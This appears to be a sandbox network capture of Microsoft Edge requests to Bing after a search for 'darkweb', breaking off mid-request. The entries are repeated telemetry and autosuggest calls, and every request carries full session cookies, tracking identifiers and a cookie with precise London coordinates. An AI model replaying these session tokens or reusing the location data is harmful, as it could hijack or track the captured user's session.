accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:12 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306952.7f21f0a
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 1584
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:13 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306953.7f2222f
POST

https://www.bing.com/fd/ls/lsp.aspx

msedge.exe

Remote address:

95.101.143.203:443

Request

POST /fd/ls/lsp.aspx HTTP/2.0
host: www.bing.com
content-length: 1508
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
content-type: text/xml
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://www.bing.com
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901

Response

HTTP/2.0 200

content-length: 395
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a49c8b6434098ea15d40203f2bf
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-ea+dAHQRa/2X25t+nwTsRpG+8Bqjp4dWZLQCgIoH2cY='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:09:13 GMT
set-cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306953.7f2222e
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=darkweb&mkt=en-gb&qry=darkweb&cp=7&csr=1&zis=1&msbqf=false&pths=1&cvid=202035EC43B64C3DBF7FE10F53408EC5

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /AS/Suggestions?pt=page.serp&bq=darkweb&mkt=en-gb&qry=darkweb&cp=7&csr=1&zis=1&msbqf=false&pths=1&cvid=202035EC43B64C3DBF7FE10F53408EC5 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 650
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901

Response

HTTP/2.0 200

content-length: 693
content-type: application/json; charset=utf-8
cache-control: private, max-age=300
content-encoding: br
vary: Accept-Encoding
x-eventid: 67502a4a83704e88bdec68794d8e8788
x-as-setsessionmarket: en-gb
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, ECT, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
useragentreductionoptout: A7kgTC5xdZ2WIVGZEfb1hUoNuvjzOZX3VIV/BA6C18kQOOF50Q0D3oWoAm49k3BQImkujKILc7JmPysWk3CSjwUAAACMeyJvcmlnaW4iOiJodHRwczovL3d3dy5iaW5nLmNvbTo0NDMiLCJmZWF0dXJlIjoiU2VuZEZ1bGxVc2VyQWdlbnRBZnRlclJlZHVjdGlvbiIsImV4cGlyeSI6MTY4NDg4NjM5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=
content-security-policy: script-src https: 'strict-dynamic' 'report-sample' 'wasm-unsafe-eval' 'nonce-15kEqD+8dvCwKoYKa2+iFPyClxtJsr9+TYX0IUNU3tk='; base-uri 'self';report-to csp-endpoint
report-to: {"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingcsp"}]}
p3p: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND"
date: Wed, 04 Dec 2024 10:09:14 GMT
set-cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb; domain=.bing.com; path=/; HttpOnly
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306954.7f228bc
GET

https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_fdb%22}]

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&Type=Event.ClientInst&DATA=[{%22T%22:%22CI.FeedbackInit%22,%22FID%22:%22CI%22,%22Name%22:%22Feedback%22,%22Text%22:%22sb_fdb%22}] HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/jpeg
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QWthbWFp"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 7802
date: Wed, 04 Dec 2024 10:09:14 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306954.7f22973
GET

https://www.bing.com/AS/Suggestions?pt=page.serp&bq=darkweb&mkt=en-gb&qry=darkweb%20&cp=8&csr=1&msbqf=false&pths=1&cvid=202035EC43B64C3DBF7FE10F53408EC5

msedge.exe

Remote address:

95.101.143.203:443

Request

GET /AS/Suggestions?pt=page.serp&bq=darkweb&mkt=en-gb&qry=darkweb%20&cp=8&csr=1&msbqf=false&pths=1&cvid=202035EC43B64C3DBF7FE10F53408EC5 HTTP/2.0
host: www.bing.com
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="90", "Microsoft Edge";v="90"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36 Edg/90.0.818.66
sec-ch-ua-arch: "x86"
x-autosuggest-contentwidth: 976
sec-ch-ua-full-version: "90.0.818.66"
sec-ch-ua-platform-version: "10.0"
ect: 4g
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.bing.com/search?q=darkweb&qs=n&form=QBRE&sp=-1&ghc=1&lq=0&pq=darkweb&sc=10-7&sk=&cvid=6AB2CD56EF6C4338BF41C655438BDF1B&ghsh=0&ghacc=0&ghpl=
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: MUID=288EEA9122C96A183944FFDA23616B9B
cookie: _EDGE_V=1
cookie: SRCHD=AF=ANAB01
cookie: SRCHUID=V=2&GUID=86884DE4C7964E9A8BDF2F6863E1FF8B&dmnchg=1
cookie: ak_bmsc=C2D6CC7390497BE1C01A7BFEDAA18236~000000000000000000000000000000~YAAQTTZ6XK2lT4iTAQAAn0QkkRprrpEhidRPBlBXEcq8yXcQA38uSNH+ETI0p/joh63w8poJaEkImLtdkLQg8/EeLnQEniFB9fWF6SoaVQIe5KSkFXprxWQ2pPBqq4I/D8YUJESQlK5QsHtLEcoDa3PnqsWEe4q04YjAJKxbTxs0IdENu3Ld3ZyU869Npt04Lj9uftmD82DOpCZZcnpaDM4NBczrWREbkwrmeCs/ZuQXeM4XhAbOZHWkHjyu4H+GFDVAyjbVFkVyMbaSsF/P9N6v2MiSZ4+HmkRq2NZ1SNJgeOjkaVuYIAwyvjJ7QYRpXBApJmvKrMqFG7BN/DQyPkYVcg40LPlKN3+Isi4ZjbcX1uRj2w4N+sXFrnRlWJZeLyIYFyoQVmRR
cookie: MUIDB=288EEA9122C96A183944FFDA23616B9B
cookie: SRCHUSR=DOB=20241204&T=1733306893000
cookie: _Rwho=u=d&ts=2024-12-04
cookie: ipv6=hit=1733310488290&t=4
cookie: BCP=AD=0&AL=0&SM=0
cookie: _EDGE_S=F=1&SID=1389AFCAD5F46BB6263EBA81D45C6A43&mkt=en-gb
cookie: _C_ETH=1
cookie: _RwBf=r=0&ilt=3&ihpd=0&ispd=3&rc=9&rb=0&gb=0&rg=200&pc=6&mtu=0&rbb=0&g=0&cid=&clo=0&v=3&l=2024-12-04T08:00:00.0000000Z&lft=0001-01-01T00:00:00.0000000&aof=0&ard=0001-01-01T00:00:00.0000000&rwdbt=0&rwflt=0&rwaul2=0&o=2&p=&c=&t=0&s=0001-01-01T00:00:00.0000000+00:00&ts=2024-12-04T10:09:00.7411999+00:00&rwred=0&wls=&wlb=&wle=&ccp=&cpt=&lka=0&lkt=0&aad=0&TH=
cookie: _SS=PC=U531&SID=1389AFCAD5F46BB6263EBA81D45C6A43&R=9&RB=0&GB=0&RG=200&RP=6
cookie: dsc=order=ShopOrderDefault
cookie: SRCHHPGUSR=SRCHLANG=en&DM=0&BRW=M&BRH=S&CW=1280&CH=601&SCW=1263&SCH=3469&DPR=1.0&UTC=0&PV=10.0&EXLTT=3&HV=1733306932&WTS=63868903693&PRVCW=1280&PRVCH=601
cookie: USRLOC=HS=1&ELOC=LAT=51.519901275634766|LON=-0.10880059748888016|N=London%2C%20Greater%20London|ELT=1|&BLOCK=TS=241204100901

Response

HTTP/2.0 200

content-length: 0
access-control-allow-origin: *
date: Wed, 04 Dec 2024 10:09:14 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.4d367a5c.1733306954.7f22972
GET

https://www.bing.com/fd/ls/l?IG=202035EC43B64C3DBF7FE10F53408EC5&TYPE=Event.ClientInst&DATA=%5B%7B%22T%22%3A%22CI.SpSbInteract%22%2C%22TS%22%3A1733306943075%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%22%2C%22T%22%3A%22CI.Request%22%2C%22TS%22%3A1733306943079%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%22%2C%22AsResponseLength%22%3A%22390%22%2C%22T%22%3A%22CI.Load%22%2C%22TS%22%3A1733306943185%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%2Cig%3A225FA5CBA999466DB7F89B91073D9FF2%22%2C%22AnswerInfo%22%3A%22HS%3B7%22%2C%22T%22%3A%22CI.Show%22%2C%22TS%22%3A1733306943199%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22Meta%22%3A%22q%3Adarkweb%20%2Ci%3A1%22%2C%22T%22%3A%22CI.Change%22%2C%22TS%22%3A1733306943972%2C%22Name%22%3A%22PerfInst%22%2C%22FID%22%3A%22AS%22%7D%2C%7B%22sbox%22%3A%22typing%22%2C%22time%22%3A13601%2C%22T%22%3A%22CI.Data%22%2C%22TS%22%3A1733306943974%2C%22Name%22%3A%22speech%22%2C%22FID%22%3A%22HP%22%7D%5D

msedge.exe

Remote address:

95.101.143.203:443

Request

